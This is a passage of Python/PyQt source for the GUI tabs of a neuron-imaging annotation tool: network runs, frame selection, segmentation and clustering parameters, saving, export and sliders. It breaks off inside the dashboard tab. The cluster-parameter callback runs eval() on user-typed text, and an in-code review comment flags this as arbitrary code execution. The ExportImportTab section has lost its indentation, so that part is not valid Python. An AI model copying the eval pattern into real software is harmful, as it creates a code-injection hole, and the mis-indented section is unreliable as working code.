            text, ok = QInputDialog.getText(self, 'Name your instance', 'Instance Name: ')  # TODO AD is self ok here or should it be another class of Qt thing?
            if not ok:
                return
            if any([el in text for el in ["\n", " ", ".", "/", "\t"]]) or text == "new":
                errdial = QErrorMessage()
                errdial.showMessage('Invalid Instance Name')
                errdial.exec_()
                return  # abort: do not run under the placeholder name
            instancename = text
        msgBox = QMessageBox()
        msgBox.setText("Confirm Neural Network Run:\n" + modelname + " on " + self.data_name + " named " + instancename)
        msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)
        confirmation = msgBox.exec()
        if confirmation == QMessageBox.Ok:
            runres, msg = self.controller.run_NN_masks(modelname, instancename, fol, int(self.epochs.text()),
                                                       int(self.trainset.text()), int(self.valset.text()),
                                                       int(self.targset.text()))
            if not runres:
                errdial = QErrorMessage()
                errdial.showMessage('Run Failed:\n' + msg)
                errdial.exec_()
            else:
                dial = QMessageBox()
                dial.setText('Run Success\n' + msg)
                dial.exec_()

    def setup_mask_NNmodels(self):
        """
        Populates the list of NN models with models existing in self.controller.
        Only for initialization (list of NN models is fixed).
        """
        self.NN_model_select.clear()
        for modelname in self.controller.NNmodels:
            self.NN_model_select.addItem(modelname)

    def populate_mask_NNinstances(self):
        """
        Populates the list of selectable NN instances with existing instances for current model and new.
        """
        self.NN_instance_select.clear()
        currname = self.NN_model_select.currentText()
        self.NN_instance_select.addItem("new")
        if currname in self.NNinstances:
            for instance in self.NNinstances[currname]:
                self.NN_instance_select.addItem(instance)

    def populate_point_NNinstances(self):
        """Refresh the helper-data combo, preserving the current selection if still available."""
        self.NN_pt_select.clear()
        currname = self.NN_pt_select.currentText()
        helper_names = self.controller.available_method_results()
        self.NN_pt_select.addItem("None")
        for name in helper_names:
            self.NN_pt_select.addItem(name)
        if currname in helper_names:
            self.NN_pt_select.setCurrentText(currname)

    def change_NN_instances(self):
        """
        Callback when new instances of NNs are created (or deleted?).
        """
        if not self.as_points:
            self.populate_mask_NNinstances()
            self.NN_mask_select.clear()
            self.NN_mask_select.addItem("")
            for net, insts in self.NNinstances.items():
                for inst in insts:
                    self.NN_mask_select.addItem(net + " " + inst)
        else:
            self.populate_point_NNinstances()

    def change_validation_set(self, validation_set):
        """Callback: display the ids of the validation frames."""
        self.val_set_display.setText(str(validation_set))

    def _Postprocess_NN_masks(self):
        """Run the selected post-processing mode on the NN masks.

        The neurons listed (comma-separated) in the Exempt_Neurons field are
        passed through to the controller.
        """
        ExNeu = self.Exempt_Neurons.text()
        ExNeu = ExNeu.split(',')
        ExNeu = [int(n) for n in ExNeu]
        Mode = self.post_process_mode
        Modes = set([1, 2, 3, 4, 5])
        assert Mode in Modes, "Acceptable modes are 1, 2, 3, 4, and 5"
        self.controller.post_process_NN_masks(Mode, ExNeu)
class SelectionTab(QScrollArea):
    """
    This is the tab that allows to select subsets of data.

    Offers ground-truth flagging, reference-frame selection, and a frame
    selector combining a percentage, a population (radio group) and an
    optional manual list of frame numbers / ranges.
    """
    def __init__(self, controller):
        """
        :param controller: main controller to report to
        """
        super().__init__()
        self.controller = controller
        main_layout = QVBoxLayout()
        all_correct_btn = QPushButton("Flag all selected frames as ground truth")
        all_correct_btn.clicked.connect(self.controller.flag_all_selected_as_gt)
        main_layout.addWidget(all_correct_btn)
        use_as_ref_btn = QPushButton("Use this frame as reference")  # (for registration)
        use_as_ref_btn.clicked.connect(self.controller.use_current_as_ref)
        main_layout.addWidget(use_as_ref_btn)
        selection_lay = QGridLayout()
        # Percentage of the chosen population to select.
        self.frac_entry = QLineEdit("100")
        self.frac_entry.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
        self.frac_entry.setValidator(QtGui.QIntValidator(0, 100))
        selection_lay.addWidget(self.frac_entry, 0, 0)
        selection_lay.addWidget(QLabel("% of"), 0, 1)
        # MB added: select individual frames manually ("1,4,7-10" style).
        self.fr_num_entry = QLineEdit("0")
        self.fr_num_entry.setStyleSheet("height: 15px; width: 5px;min-width: 150px;")
        selection_lay.addWidget(QLabel("Enter frame numb-\n ers separated\n with ,"), 1, 0)
        selection_lay.addWidget(self.fr_num_entry, 1, 1)
        # Population of frames from which to draw the selection.
        buttons_layout = QVBoxLayout()
        self.population_buttons = QButtonGroup()  # widget
        all_radiobtn = QRadioButton("all")
        all_radiobtn.setChecked(True)
        self.population_buttons.addButton(all_radiobtn)
        buttons_layout.addWidget(all_radiobtn)
        segmented_radiobtn = QRadioButton("segmented")
        segmented_radiobtn.setChecked(False)
        self.population_buttons.addButton(segmented_radiobtn)
        buttons_layout.addWidget(segmented_radiobtn)
        non_segmented_radiobtn = QRadioButton("non segmented")
        non_segmented_radiobtn.setChecked(False)
        self.population_buttons.addButton(non_segmented_radiobtn)
        buttons_layout.addWidget(non_segmented_radiobtn)
        ground_truth_radiobtn = QRadioButton("ground truth")
        ground_truth_radiobtn.setChecked(False)
        self.population_buttons.addButton(ground_truth_radiobtn)
        buttons_layout.addWidget(ground_truth_radiobtn)
        non_ground_truth_radiobtn = QRadioButton("non ground truth")
        non_ground_truth_radiobtn.setChecked(False)
        self.population_buttons.addButton(non_ground_truth_radiobtn)
        buttons_layout.addWidget(non_ground_truth_radiobtn)
        single_radiobtn = QRadioButton("manual selection")
        single_radiobtn.setChecked(False)
        self.population_buttons.addButton(single_radiobtn)
        buttons_layout.addWidget(single_radiobtn)
        selection_lay.addLayout(buttons_layout, 0, 2)
        select_btn = QPushButton("Select")
        select_btn.clicked.connect(self._frame_fraction_fun)
        selection_lay.addWidget(select_btn, 0, 3)
        main_layout.addLayout(selection_lay)
        wid = QWidget()
        wid.setLayout(main_layout)
        self.setWidget(wid)
        self.setWidgetResizable(True)
        self.setContentsMargins(5, 5, 5, 5)
        # Todo no sideways scrolling

    def _frame_fraction_fun(self):
        """Read the GUI state and ask the controller to select frames.

        The manual-frame field accepts a comma-separated mix of single frame
        numbers and inclusive "a-b" ranges. Bug fix: empty tokens (an empty
        field, a trailing comma, or stray whitespace-only entries) previously
        raised ValueError from int(''); they are now skipped.
        """
        frac = self.frac_entry.text()
        selected = set()
        for token in self.fr_num_entry.text().split(','):
            token = token.strip()
            if not token:
                continue  # tolerate empty field / trailing commas
            bounds = token.split('-')
            if len(bounds) > 1:
                # inclusive range "a-b"
                selected.update(range(int(bounds[0]), int(bounds[1]) + 1))
            else:
                selected.add(int(token))
        Tot_fr_final = sorted(selected)
        self.controller.select_frames(float(frac) / 100, Tot_fr_final,
                                      self.population_buttons.checkedButton().text())
class MaskProcessingTab(QScrollArea):
    """
    This is the tab that controls all processes specific to data with masks (though not just masks themselves): segmentation, clustering...

    Segmentation and clustering parameters are edited through pyqtgraph
    ParameterTrees whose changes are written straight back into the dataset's
    live parameter dicts.
    """
    def __init__(self, controller):
        """
        :param controller: main controller to report to
        """
        super().__init__()
        self.controller = controller
        self.seg_params = self.controller.get_seg_params()
        self.cluster_params = self.controller.get_cluster_params()
        # Warning, these two are the real dict from the dataset, can be modified but it's useless to try reassigning the variables
        # todo AD: could also be refactored in terms of just calling the controller and registering to the controller
        # for changes of params (but it's less practical)
        main_layout = QGridLayout()
        # --- segmentation parameters (collapsible parameter tree) ---
        seg_param_box = QtHelpers.CollapsibleBox("Segmentation parameters")
        lay = QVBoxLayout()
        seg_param_tree = ParameterTree()
        params = [{'name': k, 'value': v, **Parameters.pyqt_param_keywords(k)} for k, v in
                  self.seg_params.items()]
        seg_params = Parameter.create(name='params', type='group', children=params)
        seg_param_tree.setParameters(seg_params, showTop=False)
        lay.addWidget(seg_param_tree)
        def change_seg_pars(param, changes):  # Todo: as method
            # Write every changed value straight back into the dataset's dict.
            for param, change, data in changes:
                self.seg_params.update({param.name(): data})
        seg_params.sigTreeStateChanged.connect(change_seg_pars)
        seg_param_box.setContentLayout(lay)
        main_layout.addWidget(seg_param_box)
        # --- Segmentation buttons ---
        init_seg_btn = QPushButton("Test segmentation on current frame")
        init_seg_btn.clicked.connect(self.controller.test_segmentation_params)
        main_layout.addWidget(init_seg_btn)
        seg_lay = QHBoxLayout()
        coarse_seg_btn = QCheckBox("Coarse segmentation")
        coarse_seg_btn.setChecked(False)
        coarse_seg_btn.toggled.connect(self.controller.toggle_coarse_seg_mode)
        seg_btn = QPushButton("Segmentation")
        seg_btn.clicked.connect(self.controller.segment)
        seg_lay.addWidget(seg_btn)
        seg_lay.addWidget(coarse_seg_btn)
        dum = QWidget()
        dum.setLayout(seg_lay)
        main_layout.addWidget(dum)
        # --- Feature extraction ---
        ftr_lay = QHBoxLayout()
        ftr_from_seg_check = QCheckBox("from segmentations")
        ftr_from_seg_check.setChecked(False)
        ftr_from_seg_check.toggled.connect(self.controller.toggle_use_seg_for_feature)
        ftr_btn = QPushButton("Extract features")
        ftr_btn.clicked.connect(self.controller.extract_features)
        ftr_lay.addWidget(ftr_btn)
        ftr_lay.addWidget(ftr_from_seg_check)
        dum2 = QWidget()
        dum2.setLayout(ftr_lay)
        main_layout.addWidget(dum2)
        # --- clustering parameters (collapsible parameter tree) ---
        cluster_param_box = QtHelpers.CollapsibleBox("Clustering parameters")
        lay = QVBoxLayout()
        cluster_param_tree = ParameterTree()
        params = [{'name': k, 'value': v, **Parameters.pyqt_param_keywords(k)} for k, v in
                  self.cluster_params.items()]
        cluster_params = Parameter.create(name='params', type='group', children=params)
        cluster_param_tree.setParameters(cluster_params, showTop=False)
        lay.addWidget(cluster_param_tree)
        def change_cluster_pars(param, changes):  # Todo: as method
            for param, change, data in changes:
                # NOTE(review): eval() on a user-typed string allows arbitrary
                # code execution; if the values are plain Python literals,
                # ast.literal_eval would be a safe drop-in — confirm and replace.
                self.cluster_params.update({param.name(): eval(data) if isinstance(data, str) else data})
        cluster_params.sigTreeStateChanged.connect(change_cluster_pars)
        cluster_param_box.setContentLayout(lay)
        main_layout.addWidget(cluster_param_box)
        # --- remaining processing buttons ---
        cluster_btn = QPushButton("Cluster")
        cluster_btn.clicked.connect(self.controller.cluster)
        main_layout.addWidget(cluster_btn)
        clf_btn = QPushButton("Classify")
        clf_btn.clicked.connect(self.controller.classify)
        main_layout.addWidget(clf_btn)
        reg_btn = QPushButton("Auto add to ground truth")
        reg_btn.clicked.connect(self.controller.auto_add_gt_by_registration)
        main_layout.addWidget(reg_btn)
        rotation_btn = QPushButton("Compute rotation")
        rotation_btn.clicked.connect(self.controller.compute_rotation)
        main_layout.addWidget(rotation_btn)
        # One click triggers both slots, in connection order: segment, then rotate.
        coarot_btn = QPushButton("Coarse segmentation + rotation")
        coarot_btn.clicked.connect(self.controller.segment)
        coarot_btn.clicked.connect(self.controller.compute_rotation)
        main_layout.addWidget(coarot_btn)
        crop_btn = QPushButton("Crop")
        crop_btn.clicked.connect(self.controller.define_crop_region)
        main_layout.addWidget(crop_btn)
        wid = QWidget()
        wid.setLayout(main_layout)
        self.setWidget(wid)
        self.setWidgetResizable(True)
        self.setContentsMargins(5, 5, 5, 5)
class SavingTab(QScrollArea):
    """
    This is the tab for saving etc

    Hosts the auto-save toggle plus the calcium-intensity recomputation,
    save-and-repack and plain save buttons, each wired to the controller.
    """
    def __init__(self, controller):
        """
        :param controller: main controller to report to
        """
        super().__init__()
        self.controller = controller
        layout = QGridLayout()
        # Row 0: auto-save toggle (off by default).
        autosave_box = QCheckBox("Enable Auto Save")
        autosave_box.setChecked(False)
        autosave_box.toggled.connect(self.controller.toggle_autosave)
        layout.addWidget(autosave_box, 0, 0)
        # Row 1: recompute calcium intensities.
        ci_btn = QPushButton("ReCalculate Calcium Intensity")
        ci_btn.clicked.connect(self.controller.update_ci)
        ci_btn.setStyleSheet("background-color: blue")
        layout.addWidget(ci_btn, 1, 0)
        # Row 2: save and repack the dataset file.
        repack_btn = QPushButton("Save and Repack")
        repack_btn.clicked.connect(self.controller.save_and_repack)
        layout.addWidget(repack_btn, 2, 0)
        # Row 3: plain save.
        save_btn = QPushButton("Save")
        save_btn.clicked.connect(self.controller.save_status)
        save_btn.setStyleSheet("background-color: green")
        layout.addWidget(save_btn, 3, 0)
        container = QWidget()
        container.setLayout(layout)
        self.setWidget(container)
        self.setWidgetResizable(True)
        self.setContentsMargins(5, 5, 5, 5)
class ExportImportTab(QScrollArea):
"""
MB: This is the tab for preprocessing and saving an a separate file
"""
def __init__(self, controller, frame_num:int):
"""
:param controller: main controller to report to
:param frame_num: number of frames in video
"""
super().__init__()
self.controller = controller
preproc_tab_grid = QGridLayout()
row = 0
Import_section = QLabel("------------ Import Section -----------")
preproc_tab_grid.addWidget(Import_section, row, 0)
row += 1
subrow = 0
load_mask_lay = QGridLayout()
self.import_address = QLineEdit("0")
self.import_address.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
load_mask_lay.addWidget(QLabel("Address of the imported masks:"), subrow, 0)
load_mask_lay.addWidget(self.import_address, subrow, 1)
subrow += 1
reverse_transform_checkbox = QCheckBox("Reverse transform")
reverse_transform_checkbox.toggled.connect(self.controller.toggle_reverse_transform)
load_mask_lay.addWidget(reverse_transform_checkbox, subrow, 0)
Undo_cuts_checkbox = QCheckBox("Undo cuts")
Undo_cuts_checkbox.toggled.connect(self.controller.toggle_undo_cuts)
load_mask_lay.addWidget(Undo_cuts_checkbox, subrow, 1)
import_btn = QPushButton("import")
import_btn.clicked.connect(self.import_file)
load_mask_lay.addWidget(import_btn, subrow+1, 1)
import_green_btn = QPushButton("import as green mask")
import_green_btn.clicked.connect(self.import_file_green)
import_green_btn.setStyleSheet("background-color: green")
load_mask_lay.addWidget(import_green_btn, subrow+1, 0)
preproc_tab_grid.addLayout(load_mask_lay,row,0)
row += 1
Export_section = QLabel("------------ Export Section --------------")
preproc_tab_grid.addWidget(Export_section, row, 0)
row += 1
subrow = 0
save_checkboxes_lay = QGridLayout()
save_rotation_crop_checkbox = QCheckBox("Rotate and crop")
save_rotation_crop_checkbox.toggled.connect(self.controller.toggle_save_crop_rotate)
save_checkboxes_lay.addWidget(save_rotation_crop_checkbox, subrow, 0)
auto_delete_checkbox = QCheckBox("auto delete")
auto_delete_checkbox.toggled.connect(self.controller.toggle_auto_delete)
save_checkboxes_lay.addWidget(auto_delete_checkbox,subrow , 1)
subrow += 2
save_1channel_checkbox = QCheckBox("save red channel")
#bg_subtraction_checkbox.setChecked(int(default_values["just_show_first_channel"]))#MB changed bool to int
save_1channel_checkbox.toggled.connect(self.controller.toggle_save_1st_channel)
save_checkboxes_lay.addWidget(save_1channel_checkbox,subrow , 0)
save_green_checkbox = QCheckBox("save green channel")
save_green_checkbox.toggled.connect(self.controller.toggle_save_green_channel)
save_checkboxes_lay.addWidget(save_green_checkbox,subrow , 1)
subrow += 2
Blur_checkbox = QCheckBox("Blur")
Blur_checkbox.toggled.connect(self.controller.toggle_save_blurred)
save_checkboxes_lay.addWidget(Blur_checkbox, subrow, 0)
save_checkboxes_lay.addWidget(QLabel("background factor:"), subrow, 1)
self.bg_blur = QLineEdit("40")
self.bg_blur.setValidator(QtGui.QIntValidator(0, 100))
save_checkboxes_lay.addWidget(self.bg_blur, subrow, 2)
save_checkboxes_lay.addWidget(QLabel("sigma:"), subrow, 3)
self.sd_blur = QLineEdit("6")
self.sd_blur.setValidator(QtGui.QIntValidator(0, 10))
save_checkboxes_lay.addWidget(self.sd_blur, subrow, 4)
subrow += 1
bg_subtraction_checkbox = QCheckBox("Subtract bg")
bg_subtraction_checkbox.toggled.connect(self.controller.toggle_save_subtracted_bg)
save_checkboxes_lay.addWidget(bg_subtraction_checkbox, subrow, 0)
save_checkboxes_lay.addWidget(QLabel("background:"), subrow, 1)
self.bg_subt = QLineEdit("1")
self.bg_subt.setValidator(QtGui.QIntValidator(0, 10))
save_checkboxes_lay.addWidget(self.bg_subt, subrow, 2)
subrow += 2
resize_img_checkbox = QCheckBox("Resize image")
resize_img_checkbox.toggled.connect(self.controller.toggle_save_resized_img)
save_checkboxes_lay.addWidget(resize_img_checkbox, subrow, 0)
save_checkboxes_lay.addWidget(QLabel("Width:"), subrow, 1)
self.resized_width = QLineEdit("16")
self.resized_width.setValidator(QtGui.QIntValidator(0, 512))
save_checkboxes_lay.addWidget(self.resized_width, subrow, 2)
save_checkboxes_lay.addWidget(QLabel("height:"), subrow, 3)
self.resized_height = QLineEdit("32")
self.resized_height.setValidator(QtGui.QIntValidator(0, 512))
save_checkboxes_lay.addWidget(self.resized_height, subrow, 4)
preproc_tab_grid.addLayout(save_checkboxes_lay, row, 0)
row += 1
subrow = 0
approve_lay = QGridLayout()
approve_lay.addWidget(QLabel("Choose frames from:"), subrow, 0)
self.frame_from = QLineEdit("0")
self.frame_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.frame_from, subrow, 1)
approve_lay.addWidget(QLabel("to:"), subrow, 2)
self.frame_to = QLineEdit(str(frame_num))
self.frame_to.setValidator(QtGui.QIntValidator(0, frame_num))
approve_lay.addWidget(self.frame_to, subrow, 3)
subrow += 1
approve_lay.addWidget(QLabel("Delete frames:"), subrow, 0)
self.delete_fr = QLineEdit(str(frame_num)+","+str(frame_num+1))
self.delete_fr.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
approve_lay.addWidget(self.delete_fr, subrow, 1)
approve_lay.addWidget(QLabel("and intervals:"), subrow, 2)
self.delete_inter = QLineEdit(str(frame_num)+"-"+str(frame_num+1))
self.delete_inter.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
approve_lay.addWidget(self.delete_inter, subrow, 3)
subrow += 1
approve_lay.addWidget(QLabel("Choose z from:"), subrow, 0)
self.z_from = QLineEdit("0")
self.z_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.z_from, subrow, 1)
approve_lay.addWidget(QLabel("to:"), subrow, 2)
self.z_to = QLineEdit("32")
self.z_to.setValidator(QtGui.QIntValidator(0, 35))
approve_lay.addWidget(self.z_to, subrow, 3)
subrow += 1
approve_lay.addWidget(QLabel("Choose x from:"), subrow, 0)
self.x_from = QLineEdit("0")
approve_lay.addWidget(self.x_from, subrow, 1)
approve_lay.addWidget(QLabel("to:"), subrow, 2)
self.x_to = QLineEdit("0")
#self.x_to.setValidator(QtGui.QIntValidator(0, 1025))
approve_lay.addWidget(self.x_to, subrow, 3)
subrow += 1
approve_lay.addWidget(QLabel("Choose y from:"), subrow, 0)
self.y_from = QLineEdit("0")
#self.y_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.y_from, subrow, 1)
approve_lay.addWidget(QLabel("to:"), subrow, 2)
self.y_to = QLineEdit("0")
#self.y_to.setValidator(QtGui.QIntValidator(0, 1025))
approve_lay.addWidget(self.y_to, subrow, 3)
subrow += 1
save_separate_btn = QPushButton("Save in a separate file")
save_separate_btn.clicked.connect(self._Preprocess_and_save)
approve_lay.addWidget(save_separate_btn)
preproc_tab_grid.addLayout(approve_lay, row, 0)
row += 1
wid = QWidget()
wid.setLayout(preproc_tab_grid)
self.setWidget(wid)
self.setWidgetResizable(True)
self.setContentsMargins(5, 5, 5, 5)
def _Preprocess_and_save(self):
    """Gather all preprocessing settings from the UI and forward them to the controller.

    Reads the z/x/y crop intervals, the frame range, the frames to delete
    (comma-separated single frames plus dash-separated inclusive intervals)
    and the blur / background-subtraction / resize parameters, then calls
    ``controller.Preprocess_and_save``.
    """
    # Crop intervals as 2-element float arrays [start, stop] (same layout as np.zeros(2)).
    Z_int = np.array([int(self.z_from.text()), int(self.z_to.text())], dtype=float)
    X_int = np.array([int(self.x_from.text()), int(self.x_to.text())], dtype=float)
    Y_int = np.array([int(self.y_from.text()), int(self.y_to.text())], dtype=float)
    frame_range = range(int(self.frame_from.text()), int(self.frame_to.text()))
    # Frames to delete: single frames like "3,7" plus inclusive intervals like "5-8,12-14".
    Tot_del_fr = {int(fr) for fr in self.delete_fr.text().split(',')}
    for interval in self.delete_inter.text().split(','):
        parts = interval.split('-')
        Tot_del_fr.update(range(int(parts[0]), int(parts[1]) + 1))
    # BUG FIX: the int-converted list (Tot_del_fr_final) used to be computed but the
    # raw set was passed on instead; pass a sorted int list so downstream iteration
    # order is deterministic. (Debug print of each interval removed.)
    Tot_del_fr_final = sorted(Tot_del_fr)
    bg_blur = int(self.bg_blur.text())
    sd_blur = int(self.sd_blur.text())
    bg_subt = int(self.bg_subt.text())
    resized_width = int(self.resized_width.text())
    resized_height = int(self.resized_height.text())
    self.controller.Preprocess_and_save(frame_range, Tot_del_fr_final, Z_int, X_int, Y_int,
                                        bg_blur, sd_blur, bg_subt, resized_width, resized_height)
def import_file(self):
    """Forward the mask path typed in the address field to the controller."""
    self.controller.import_mask_from_external_file(self.import_address.text())
def import_file_green(self):
    """Import the mask file at the typed address, flagged as a green mask."""
    path = self.import_address.text()
    self.controller.import_mask_from_external_file(path, green=True)
class LabeledSlider(QWidget):
    """A QSlider (exposed as ``self.sl``) wrapped in a widget that paints a text
    label under (horizontal) or beside (vertical) each labelled tick, growing the
    layout margins on the fly so labels are never clipped.
    """
    def __init__(self, minimum, maximum, interval=1, orientation=Qt.Horizontal,
            labels=None, parent=None):
        """
        :param minimum: inclusive lower bound of the slider range
        :param maximum: inclusive upper bound of the slider range
        :param interval: value step between labelled ticks
        :param orientation: Qt.Horizontal or Qt.Vertical
        :param labels: optional list/tuple of label strings, one per tick level
        """
        super(LabeledSlider, self).__init__(parent=parent)
        # Tick values to label; drop the last one if it overshoots maximum.
        levels=list(range(minimum, maximum+interval, interval))
        if levels[-1]>maximum:
            levels=levels[:-1]
            #levels[-1]=maximum
        if labels is not None:
            if not isinstance(labels, (tuple, list)):
                raise Exception("<labels> is a list or tuple.")
            if len(labels) != len(levels):
                raise Exception("Size of <labels> doesn't match levels.")
            self.levels=list(zip(levels,labels))
        else:
            # Default labels: the tick values themselves rendered as strings.
            self.levels=list(zip(levels,map(str,levels)))
        if orientation==Qt.Horizontal:
            self.layout=QVBoxLayout(self)
        elif orientation==Qt.Vertical:
            self.layout=QHBoxLayout(self)
        else:
            raise Exception("<orientation> wrong.")
        # gives some space to print labels
        self.left_margin=10
        self.top_margin=10
        self.right_margin=10
        self.bottom_margin=10
        self.layout.setContentsMargins(self.left_margin,self.top_margin,
                self.right_margin,self.bottom_margin)
        self.sl=QSlider(orientation, self)
        self.sl.setMinimum(minimum)
        self.sl.setMaximum(maximum)
        self.sl.setValue(minimum)
        if orientation==Qt.Horizontal:
            self.sl.setTickPosition(QSlider.TicksBelow)
            self.sl.setMinimumWidth(300) # just to make it easier to read
        else:
            self.sl.setTickPosition(QSlider.TicksLeft)
            self.sl.setMinimumHeight(300) # just to make it easier to read
        self.sl.setTickInterval(interval)
        self.sl.setSingleStep(1)
        self.layout.addWidget(self.sl)

    def paintEvent(self, e):
        """Paint the slider normally, then draw one text label per tick level.

        When a label would be clipped at either end, the corresponding layout
        margin is enlarged so a subsequent paint pass has room for it.
        """
        super(LabeledSlider,self).paintEvent(e)
        style=self.sl.style()
        painter=QPainter(self)
        st_slider=QStyleOptionSlider()
        st_slider.initFrom(self.sl)
        st_slider.orientation=self.sl.orientation()
        length=style.pixelMetric(QStyle.PM_SliderLength, st_slider, self.sl)
        available=style.pixelMetric(QStyle.PM_SliderSpaceAvailable, st_slider, self.sl)
        for v, v_str in self.levels:
            # get the size of the label (drawText with TextDontPrint only measures)
            rect=painter.drawText(QRect(), Qt.TextDontPrint, v_str)
            if self.sl.orientation()==Qt.Horizontal:
                # I assume the offset is half the length of slider, therefore
                # + length//2
                x_loc=QStyle.sliderPositionFromValue(self.sl.minimum(),
                        self.sl.maximum(), v, available)+length//2
                # left bound of the text = center - half of text width + L_margin
                left=x_loc-rect.width()//2+self.left_margin
                bottom=self.rect().bottom()
                # enlarge margins if clipping
                if v==self.sl.minimum():
                    if left<=0:
                        self.left_margin=rect.width()//2-x_loc
                    if self.bottom_margin<=rect.height():
                        self.bottom_margin=rect.height()
                    self.layout.setContentsMargins(self.left_margin,
                            self.top_margin, self.right_margin,
                            self.bottom_margin)
                if v==self.sl.maximum() and rect.width()//2>=self.right_margin:
                    self.right_margin=rect.width()//2
                    self.layout.setContentsMargins(self.left_margin,
                            self.top_margin, self.right_margin,
                            self.bottom_margin)
            else:
                y_loc=QStyle.sliderPositionFromValue(self.sl.minimum(),
                        self.sl.maximum(), v, available, upsideDown=True)
                bottom=y_loc+length//2+rect.height()//2+self.top_margin-3
                # there is a 3 px offset that I can't attribute to any metric
                left=self.left_margin-rect.width()
                if left<=0:
                    self.left_margin=rect.width()+2
                    self.layout.setContentsMargins(self.left_margin,
                            self.top_margin, self.right_margin,
                            self.bottom_margin)
            pos=QPoint(left, bottom)
            painter.drawText(pos, v_str)
        return
class TimeSlider(LabeledSlider):
    """Labelled slider used to navigate through the frames of the video."""

    def __init__(self, controller, T, n_labels):
        """
        :param controller: main controller, notified via ``go_to_frame``
        :param T: number of frames in the video
        :param n_labels: requested number of tick labels (capped at T)
        """
        self.controller = controller
        # Register so the controller calls change_t back on frame changes.
        self.controller.frame_registered_clients.append(self)
        if n_labels > T:
            n_labels = T
        super(TimeSlider, self).__init__(minimum=0, maximum=T - 1, interval=int(T / n_labels))
        self.sl.valueChanged.connect(lambda: self.controller.go_to_frame(self.sl.value()))

    def change_t(self, t):
        """Callback when the controller changes the time, this adjusts the slider display.

        Blocking the signal is very important: otherwise setValue would emit
        valueChanged, which would re-trigger controller.go_to_frame (which calls
        change_t) and cause an infinite loop.
        (Cleanup: removed a dead ``if True:`` guard and a commented-out debug value.)
        """
        self.sl.blockSignals(True)
        self.sl.setValue(t)
        self.sl.blockSignals(False)
class GoTo(QWidget):
    """
    This is the field and button to manually enter the frame number and move to it.
    """

    def __init__(self, controller, nb_frames: int):
        """
        :param controller: main controller to report to
        :param nb_frames: number of frames in video
        """
        super().__init__()
        self.controller = controller
        # Frame-number field, restricted to the valid frame range.
        self.text_field = QLineEdit("0")
        self.text_field.setValidator(QtGui.QIntValidator(0, nb_frames - 1))
        go_button = QPushButton("Go")
        go_button.setStyleSheet("background-color : rgb(93,177,130); border-radius: 4px; min-height: 20px; min-width: 50px")
        go_button.clicked.connect(self.signal_goto)
        self.grid = QGridLayout()
        for column, widget in enumerate((QLabel("Go To Frame: "), self.text_field, go_button)):
            self.grid.addWidget(widget, 0, column)
        self.setLayout(self.grid)

    def signal_goto(self):
        """Ask the controller to jump to the frame typed in the field."""
        target = int(self.text_field.text())
        self.controller.go_to_frame(target)
class DashboardTab(QWidget):
    """Scrollable dashboard grid: one row per frame of the current time chunk,
    one column per key-assigned neuron, each cell showing neuron presence.

    Clicking a row's time button jumps to that frame; clicking a column header
    highlights the neuron; clicking a cell does both.
    """
    def __init__(self, controller, dashboard_chunk_size):
        """
        :param controller: main controller to report to and register with
        :param dashboard_chunk_size: number of frame rows displayed per chunk
        """
        super().__init__()
        self.controller = controller
        self.T = self.controller.frame_num
        # Register for the controller events this tab reacts to.
        self.controller.frame_registered_clients.append(self)
        self.controller.neuron_keys_registered_clients.append(self)
        self.controller.present_neurons_registered_clients.append(self)
        self.controller.present_neurons_all_times_registered_clients.append(self)
        self.scrollarea = QScrollArea()
        self.scrollwidget = QWidget()
        self.chunksize = dashboard_chunk_size
        self.n_cols = 0          # number of neuron columns currently displayed
        self.chunknumber = 0     # index of the chunk of frames currently displayed
        self.current_i = 0 # the line number of the current time t, i.e. t%self.chunksize
        self.grid = QGridLayout()
        self.time_label_buttons = []    # leftmost column: one button per row, labelled with its frame
        self.button_columns = {}        # neuron idx (from 1) -> [header button, then per-row items]
        for i in range(self.chunksize): # TODO AD align left rather than centering (when no neuron is assigned)
            label_button = QPushButton(str(i) if i < self.T else "")
            label_button.clicked.connect(self._make_button_press_function_t(i))
            label_button.setStyleSheet("background-color : rgb(255,255,255); border-radius: 4px;")
            label_button.setFixedWidth(30)
            self.time_label_buttons.append(label_button)
            self.grid.addWidget(label_button, i, 0)
        # Highlight the row of the current frame in blue.
        current_btn = self.current_label_button
        current_btn.setStyleSheet("background-color : rgb(42,99,246); border-radius: 4px;")
        self.scrollwidget.setLayout(self.grid)
        self.scrollarea.setWidget(self.scrollwidget)
        self.scrollarea.setMinimumWidth(
            self.scrollarea.sizeHint().width() + self.scrollarea.verticalScrollBar().sizeHint().width())
        self.scrollarea.horizontalScrollBar().setEnabled(False)
        self.scrollarea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        self.scrollarea.setWidgetResizable(True)
        self.scrollarea.setContentsMargins(5, 5, 5, 5)
        maingrid = QVBoxLayout()
        # The header row (neuron key buttons) lives in its own fixed-height scroll area.
        topscrollarea = QScrollArea()
        topscrollarea.setFixedHeight(40)
        topscrollarea.setWidgetResizable(True)
        topscrollarea.setContentsMargins(5, 5, 5, 5)
        topscrollwidget = QWidget()
        self.topgrid = QGridLayout()
        # Blank corner button above the time-label column.
        button = QPushButton("")
        button.setFixedWidth(30)
        button.setStyleSheet("background-color : rgb(255,255,255); border-radius: 4px;")
        self.topgrid.addWidget(button, 0, 0)
        self.keys = {}
        topscrollwidget.setLayout(self.topgrid)
        topscrollarea.setWidget(topscrollwidget)
        topscrollarea.setMinimumWidth(
            topscrollarea.sizeHint().width() + topscrollarea.verticalScrollBar().sizeHint().width())
        topscrollarea.horizontalScrollBar().setEnabled(False)
        topscrollarea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        maingrid.addWidget(topscrollarea)
        maingrid.addWidget(self.scrollarea)
        self.setLayout(maingrid)

    @property
    def current_label_button(self):
        # Time button of the row corresponding to the current frame.
        return self.time_label_buttons[self.current_i]

    def _make_button_press_function_t(self, i):
        """Return a callback jumping to the frame displayed in row ``i``."""
        def button_press_function():
            self.controller.go_to_frame(np.clip(self.chunksize * self.chunknumber + i, 0, self.T-1))
        return button_press_function

    def _make_button_press_function_h(self, idx_from1):
